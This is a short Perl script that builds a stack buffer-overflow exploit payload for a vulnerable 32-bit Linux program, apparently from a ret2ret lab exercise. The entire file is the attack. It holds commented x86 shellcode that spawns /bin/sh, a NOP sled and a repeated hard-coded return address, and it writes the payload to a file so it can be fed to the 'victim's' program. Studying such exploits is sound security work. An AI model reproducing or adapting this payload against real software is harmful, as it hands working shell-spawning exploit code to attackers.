#!/usr/bin/perl

# shellcode for spawning a new shell in victim's machine
my $shellcode =
"\x31\xc0".			# xorl		%eax, %eax
"\x50".				# pushl	%eax
"\x68\x6e\x2f\x73\x68".		# pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69".		# pushl	$0x69622f2f
"\x89\xe3" .			# movl         %esp, %ebx
"\x99".				# cltd
"\x52".				# pushl        %edx
"\x53".				# pushl        %ebx
"\x89\xe1".		        # movl         %esp, %ecx
"\xb0\x0b" .                    # movb         $0xb, %al
"\xcd\x80"                      # int          $0x80
;

# This address must match the address of the ret commmand */
my $retaddr = "\x6c\x84\x04\x08" x 4;  #0x0804846c

# Fill NOP instruction
my $pad = "\x90" x 232;

# Input string to our victim's program
my $arg = $pad.$shellcode.$retaddr;

# Let us store the input string to a file
open OUT, "> payload_ret2ret";
print OUT $arg;
close OUT;